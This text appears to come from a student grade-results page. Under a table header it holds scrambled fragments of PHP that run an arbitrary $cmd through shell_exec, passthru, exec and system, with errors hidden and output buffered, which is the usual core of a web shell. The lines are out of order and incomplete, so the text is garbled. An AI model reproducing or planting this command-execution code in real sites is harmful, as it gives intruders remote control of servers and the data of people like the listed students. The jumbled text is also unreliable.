Student Name Roll No. Reg. No Course Name Gread Point
$buff = @shell_exec($cmd);
}
return $buff;
@ob_end_clean();
$buff = @ob_get_contents();
@passthru($cmd);
@ob_start();
}
return $buff;
}
$buff .= $result;
foreach($results as $result){
$buff = "";
@exec($cmd
}
return $buff;
@ob_end_clean();
$buff = @ob_get_contents();
@system($cmd);
@ob_start();